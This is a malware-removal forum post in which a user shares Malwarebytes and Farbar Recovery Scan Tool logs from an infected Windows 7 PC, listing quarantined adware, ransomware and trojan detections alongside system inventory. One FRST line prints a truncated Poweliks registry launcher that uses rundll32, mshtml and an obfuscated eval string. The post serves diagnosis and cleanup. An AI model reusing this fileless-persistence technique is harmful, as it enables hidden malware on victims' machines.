Jump to content

Another dllhost.exe*32 com surrogate issue


Recommended Posts

Here is the malwarebytes anti-malware scan
 

Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 11/11/2014
Scan Time: 3:46:02 PM
Logfile: malwarebytes.txt
Administrator: Yes
 
Version: 2.00.3.1025
Malware Database: v2014.11.11.08
Rootkit Database: v2014.11.11.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled
 
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Swintal
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 428473
Time Elapsed: 20 min, 45 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 33
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{8660E5B3-6C41-44DE-8503-98D99BBECD41}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\TYPELIB\{EC4085F2-8DB3-45a6-AD0B-CA289F3C5D7E}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{0FA32667-9A8A-4E9C-902F-CA3323180003}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{2A42D13C-D427-4787-821B-CF6973855778}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{3D8478AA-7B88-48A9-8BCB-B85D594411EC}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{4D8ED2B3-DC62-43EC-ABA3-5B74F046B1BE}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{6B458F62-592F-4B25-8967-E6A350A59328}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{95B6A271-FEB4-4160-B0FF-44394C21C8DC}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{E67D5BC7-7129-493E-9281-F47BDAFACE4F}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{FCC9CDD3-EFFF-11D1-A9F0-00A0244AC403}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{0FA32667-9A8A-4E9C-902F-CA3323180003}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{2A42D13C-D427-4787-821B-CF6973855778}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{3D8478AA-7B88-48A9-8BCB-B85D594411EC}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{4D8ED2B3-DC62-43EC-ABA3-5B74F046B1BE}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{6B458F62-592F-4B25-8967-E6A350A59328}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{95B6A271-FEB4-4160-B0FF-44394C21C8DC}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{E67D5BC7-7129-493E-9281-F47BDAFACE4F}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{FCC9CDD3-EFFF-11D1-A9F0-00A0244AC403}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{EC4085F2-8DB3-45a6-AD0B-CA289F3C5D7E}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\TBSB07898.IEToolbar.1, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\CLASSES\TBSB07898.IEToolbar, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TBSB07898.IEToolbar, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TBSB07898.IEToolbar.1, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKU\S-1-5-21-4134620719-2527629264-1752102789-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{8660E5B3-6C41-44DE-8503-98D99BBECD41}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKU\S-1-5-21-4134620719-2527629264-1752102789-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{8660E5B3-6C41-44DE-8503-98D99BBECD41}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.BestToolbar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{FCBCCB87-9224-4B8D-B117-F56D924BEB18}, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], 
PUP.Optional.BestToolbar.A, HKLM\SOFTWARE\CLASSES\Toolbar3.TBSB07898.1, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], 
PUP.Optional.BestToolbar.A, HKLM\SOFTWARE\CLASSES\Toolbar3.TBSB07898, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], 
PUP.Optional.BestToolbar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Toolbar3.TBSB07898, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], 
PUP.Optional.BestToolbar.A, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{FCBCCB87-9224-4B8D-B117-F56D924BEB18}, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], 
PUP.Optional.BestToolbar.A, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Toolbar3.TBSB07898.1, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], 
PUP.Optional.BestToolbar.A, HKU\S-1-5-21-4134620719-2527629264-1752102789-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{FCBCCB87-9224-4B8D-B117-F56D924BEB18}, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], 
PUP.Optional.BestToolbar.A, HKU\S-1-5-21-4134620719-2527629264-1752102789-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{FCBCCB87-9224-4B8D-B117-F56D924BEB18}, Quarantined, [e79d40fafe7e270fbe9b882d6c968878], 
 
Registry Values: 2
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\TOOLBAR|{8660E5B3-6C41-44DE-8503-98D99BBECD41}, Quarantined, [c6bebd7dc4b853e313eb882e8d75eb15], 
PUP.Optional.CouponBar.A, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\TOOLBAR\{8660E5B3-6C41-44DE-8503-98D99BBECD41}, Quarantined, [394bb684f488b383c8367b3b8d758080], 
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 3
Trojan.Ransom.ED, C:\Users\Swintal\AppData\Local\Temp\2A9C.tmp, Quarantined, [404476c47b015cdab8b442a036cb8080], 
Trojan.Agent, C:\Users\Swintal\AppData\Local\Temp\FlyTampa_Libraries_FSX_P3D.exe, Quarantined, [8bf998a2413bd363f57b8bd7f0103ac6], 
Trojan.Ransom.ED, C:\Users\Swintal\AppData\Local\Temp\2B47.tmp, Quarantined, [800484b6c5b7d660de8ea939738e867a], 
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)
Link to post
Share on other sites

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 10-11-2014

Ran by Swintal (administrator) on SWINTAL-PC on 11-11-2014 21:37:28

Running from C:\Users\Swintal\Desktop

Loaded Profile: Swintal (Available profiles: Swintal & Brian)

Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)

Internet Explorer Version 11

Boot Mode: Normal


 

==================== Processes (Whitelisted) =================

 

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

 

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe

(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe

(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe

() C:\Program Files (x86)\ASUS\AXSP\1.01.01\atkexComSvc.exe

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe

(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe

(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe

(ESET) C:\Program Files\ESET\ESET Smart Security\x86\ekrn.exe

(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe

(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe

(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler.exe

(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler64.exe

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe

(Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe

(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe

(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe

(Microsoft Corporation) C:\Windows\System32\msiexec.exe

(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe

(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe

(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE

(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe

(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\msosync.exe

(Microsoft Corporation) C:\Windows\System32\wbengine.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe

(ESET) C:\Program Files\ESET\ESET Smart Security\egui.exe

(Garmin Ltd or its subsidiaries) C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe

(Hewlett-Packard Co.) C:\Program Files\HP\HP ENVY 4500 series\Bin\ScanToPCActivationApp.exe

(Google Inc.) C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe

(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe

(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe

(PI Engineering) C:\Program Files (x86)\PI Engineering\MacroWorks 3.1\MacroWorks 3r.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe

(Navigraph) C:\Program Files (x86)\Navigraph\FMS Data Manager\NGFMSAgent.exe

(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe

(Apple Inc.) E:\iTunes\iTunesHelper.exe

(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe

(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe

(Garmin Ltd or its subsidiaries) C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe

(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe

(Microsoft Corporation) C:\Windows\System32\vds.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe

(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\AppleChromeDAV.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

(Hewlett-Packard Co.) C:\Program Files\HP\HP ENVY 4500 series\Bin\HPNetworkCommunicatorCom.exe

 

 

==================== Registry (Whitelisted) ==================

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

 

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7188552 2013-05-27] (Realtek Semiconductor)

HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch

HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2464072 2014-11-06] (NVIDIA Corporation)

HKLM\...\Run: [shadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart

HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET Smart Security\egui.exe [5595336 2014-10-01] (ESET)

HKLM-x32\...\Run: [uSB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-04-25] (Intel Corporation)

HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)

HKLM-x32\...\Run: [Navigraph FMS Data Manager] => C:\Program Files (x86)\Navigraph\FMS Data Manager\NGFMSAgent.exe [1006576 2014-06-03] (Navigraph)

HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)

HKLM-x32\...\Run: [] => [X]

HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)

HKLM-x32\...\Run: [iTunesHelper] => E:\iTunes\iTunesHelper.exe [157480 2014-10-15] (Apple Inc.)

HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [688984 2014-07-23] (Garmin Ltd or its subsidiaries)

HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [GoogleDriveSync] => C:\Program Files (x86)\Google\Drive\googledrivesync.exe [22869088 2014-10-21] (Google)

HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [HP ENVY 4500 series (NET)] => C:\Program Files\HP\HP ENVY 4500 series\Bin\ScanToPCActivationApp.exe [3487240 2014-03-06] (Hewlett-Packard Co.)

HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [Google Update] => C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2014-08-10] (Google Inc.)

HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [Google+ Auto Backup] => C:\Users\Swintal\AppData\Local\Programs\Google\Google+ Auto Backup\Google+ Auto Backup.exe [3746120 2014-08-12] (Google Inc.)

HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [43816 2014-10-17] (Apple Inc.)

HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [ApplePhotoStreams] => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [43816 2014-10-17] (Apple Inc.)

HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [iCloudDrive] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe [43816 2014-10-20] (Apple Inc.)

HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!

HKU\S-1-5-18\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [688984 2014-07-23] (Garmin Ltd or its subsidiaries)

Startup: C:\Users\Swintal\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MacroWorks 3.1.lnk

ShortcutTarget: MacroWorks 3.1.lnk -> C:\Program Files (x86)\PI Engineering\MacroWorks 3.1\MacroWorks 3r.exe (PI Engineering)

ShellIconOverlayIdentifiers: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL (Microsoft Corporation)

ShellIconOverlayIdentifiers: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL (Microsoft Corporation)

ShellIconOverlayIdentifiers: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL (Microsoft Corporation)

 

==================== Internet (Whitelisted) ====================

 

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

 

HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie

HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION

SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.google.com/search?q={sear

SearchScopes: HKCU - {96bd48dd-741b-41ae-ac4a-aff96ba00f7e} URL = http://search.coupons.com/search.asp?p=df&q={searchTerms}

BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll (Microsoft Corporation)

BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)

BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL (Microsoft Corporation)

BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL (Microsoft Corporation)

BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\OCHelper.dll (Microsoft Corporation)

BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)

BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\URLREDIR.DLL (Microsoft Corporation)

BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\GROOVEEX.DLL (Microsoft Corporation)

DPF: HKLM-x32 {0D41B8C5-2599-4893-8183-00195EC8D5F9} http://support.asus.com/select/asusTek_sys_ctrl3.cab

DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://blueconnect.jetblue.com/dana-cached/sc/JuniperSetupClient.cab

Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL (Microsoft Corporation)

Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\MSOSB.DLL (Microsoft Corporation)

Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62

 

FireFox:

========

FF Plugin: @microsoft.com/GENUINE -> disabled No File

FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL (Microsoft Corporation)

FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> E:\iTunes\Mozilla Plugins\npitunes.dll ()

FF Plugin-x32: @canon.com/MycameraPlugin -> C:\Program Files (x86)\Canon\MyCamera Download Plugin\NPCIG.dll (CANON INC.)

FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)

FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)

FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File

FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\NPSPWRAP.DLL (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)

FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)

FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)

FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

FF Plugin HKU\S-1-5-21-4134620719-2527629264-1752102789-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Swintal\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

FF Plugin HKU\S-1-5-21-4134620719-2527629264-1752102789-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Swintal\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

 

Chrome: 

=======

CHR HomePage: Default -> hxxp://www.google.com

CHR StartupUrls: Default -> "hxxp://www.google.com"

CHR Profile: C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default

CHR Extension: (Google Drive) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-03-16]

CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-09-13]

CHR Extension: (DoNotTrackMe: Online Privacy Protection) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\epanfjkfahimkgomnigadpkobaefekcd [2014-07-18]

CHR Extension: (iCloud Bookmarks) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\fkepacicchenbjecpbpbclokcabebhah [2014-10-03]

CHR Extension: (Hide My Ass) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmjonpeiaiacbgfgemlchebljmfgjnmh [2014-07-18]

CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2014-11-06]

CHR Extension: (WeatherBug) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\njkkjobcechefaoknodniidfjapgfoco [2014-07-18]

CHR Extension: (Google Wallet) - C:\Users\Swintal\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-03-01]

 

==================== Services (Whitelisted) =================

 

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

 

R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.01\atkexComSvc.exe [927232 2012-10-29] ()

R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2436280 2014-09-25] (Microsoft Corporation)

R2 ekrn; C:\Program Files\ESET\ESET Smart Security\x86\ekrn.exe [1349576 2014-10-01] (ESET)

R2 Garmin Core Update Service; C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe [438616 2014-07-23] (Garmin Ltd or its subsidiaries)

R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1148744 2014-11-06] (NVIDIA Corporation)

S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]

R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)

R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation) [File not signed]

R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1795912 2014-11-06] (NVIDIA Corporation)

R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [19819848 2014-11-06] (NVIDIA Corporation)

 

==================== Drivers (Whitelisted) ====================

 

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

 

R0 asahci64; C:\Windows\System32\DRIVERS\asahci64.sys [47512 2013-01-10] (Asmedia Technology)

R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2012-08-21] ()

R3 e1dexpress; C:\Windows\System32\DRIVERS\e1d62x64.sys [496400 2013-02-26] (Intel Corporation)

R1 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [243440 2014-08-18] (ESET)

U5 edevmon; C:\Windows\System32\Drivers\edevmon.sys [241368 2014-08-18] (ESET)

R1 ehdrv; C:\Windows\System32\DRIVERS\ehdrv.sys [169280 2014-08-18] (ESET)

